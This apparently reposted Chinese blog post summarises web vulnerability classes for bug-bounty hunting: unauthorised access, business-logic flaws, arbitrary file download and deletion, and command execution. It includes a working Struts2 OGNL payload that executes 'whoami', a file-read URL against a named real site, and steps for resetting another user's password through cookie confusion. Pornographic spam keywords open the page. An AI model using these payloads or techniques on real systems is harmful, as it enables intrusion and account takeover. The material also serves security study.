日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

src漏洞类型总结

發布時間:2023/12/2 编程问答 34 豆豆
生活随笔 收集整理的這篇文章主要介紹了 src漏洞类型总结 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

本文轉載于https://blog.csdn.net/qq_33942040/article/details/111831536

這三類存在漏洞可能更大

越他娘丑的站,越有可能存在洞。 Asp aspx 存在漏洞的可能更大 登陸口沒得驗證碼的可能存在


一,未授權訪問

常見28種服務器或者中間協議未授權訪問
易出現處
①照片訪問類代目錄類處
如烏云實例
在http://learn.open.com.cn/登入
首頁-詳細信息-查看 查看照片地址


發現目錄泄露了
http://oemsresource.open.com.cn/Attachment/ExportTemp/OEMS/PictureTemp/20160711/
② …/ 、 WEB-INF 、 jsp$(jsp結尾)類的文件讀取類(典型過濾該類內容即可實現過濾類)

③審計元素代改包內容

二,邏輯漏洞

二具二可
可多開,考慮多開邏輯。
具多量,考慮空邏輯與覆蓋邏輯或者替換邏輯
具數字,考慮溢出邏輯
可簽到類–>可考慮并發邏輯

#業務邏輯漏洞 常規思路 ①值返回到頁面中類型-->有點像泄露邏輯 ②根據返回包判斷可否的邏輯 #騷思路邏輯 ①并發邏輯-->啟用一個直接并發同時打開好多個 ②覆蓋邏輯-->典型cookie覆蓋邏輯 ③校驗邏輯-->典型未校驗--> 1.)如簽約即可購買低價會員類邏輯,如果支付寶和微信均可,可以多開嘗試是否校驗校驗解約后再次簽約的情況 2.)是否校驗重復打開簽約的情況(多開同開繞過) 3.)空校驗邏輯繞過④溢出邏輯(因為溢出后會從零開始算導致)--> 正數溢出-->即變量大于int類的數據導致如單價為2,要正數溢出-->可以1073741825個*2即大于2147483647 負數溢出-->即典型負負得正的操作

八種廠商的邏輯漏洞挖掘思路
①cookie混淆–>兩個同時進行找回密碼
(利用原理–>同一個瀏覽器中同時找回兩個賬戶的密碼,即一個瀏覽器找回不同密碼時,兩個賬號的cookie相同導致的)
(驗證碼與cookie綁定而兩賬號此時cookie相同造成了混淆,造成cookie混淆,進而實現越權更改密碼)
實際例子–>烏云1905后臺重置密碼處

注冊個賬號分析下數據包感覺聞到了cookie混淆的味道
使用我的賬號進行正常找回密碼流程獲取驗證碼,停留在輸入驗證碼頁面


這時在同一瀏覽器打開新的網頁,用被害賬號test進行正常找回流程停止輸入手機驗證碼頁面

然后在我的賬號的新密碼頁面輸入新密碼
提交后收到200返回包重置成功,test的密碼被重置了!!

這里是因為驗證碼與cookie綁定而兩賬號此時cookie相同造成了混淆
②cookie處返回了加密的驗證碼

③返回密碼的郵箱在前端處
如案例
即改為自己的郵箱即可獲取到相應的驗證碼

三,任意文件下載

典型以downloadFile文件結尾或者其他內容結尾的內容
典型案列

#如中國證券協會 http://person.sac.net.cn/pages/sacinfo/downloadFile.action?inputPath=WEB-INF%2Fweb.xml&fileName=studentFlow.pdf

四,任意文件刪除

原因:網站支持input delete等多余協議導致
烏云案例
即支持PUT DELETE協議導致后臺任意文件刪除

五,命令執行漏洞

①支持命令執行類
如下
支持shell命令

執行后即可輸入命令的返回值狀況
②cve或者struts2漏洞執行等漏洞
利用方式:
利用漏洞利用工具直接執行即可

struts2漏洞典型手動利用代碼

redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23s%3dnew%20java.util.Scanner((new%20java.lang.ProcessBuilder(%27whoami%27.toString().split(%27\\s%27))).start().getInputStream()).useDelimiter(%27\\A%27),%23str%3d%23s.hasNext()?%23s.next():%27%27,%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().println(%23str),%23resp.getWriter().flush(),%23resp.getWriter().close()}

典型cve
1.)CVE-2014-0160
心臟滴血漏洞
2.)反序列化漏洞
原理:一個序列化的對象轉換為字節的時候,代碼審核不嚴格導致的命令執行漏洞
jboss反序列化教程
java rmi反序列化漏洞–>典型1099端口

六.其余專題

文件泄露專題
xxe漏洞專題
ssrf漏洞專題
任意文件讀取專題
getshell專題
iframe劫持專題
URL重定向專題
xss專題
web特殊漏洞專題
路徑端口工具專題

表達式注入–>即由于表達式引起的命令執行漏洞

典型:即框架接受參數后可執行命令導致
表達式注入

總結

以上是生活随笔為你收集整理的src漏洞类型总结的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。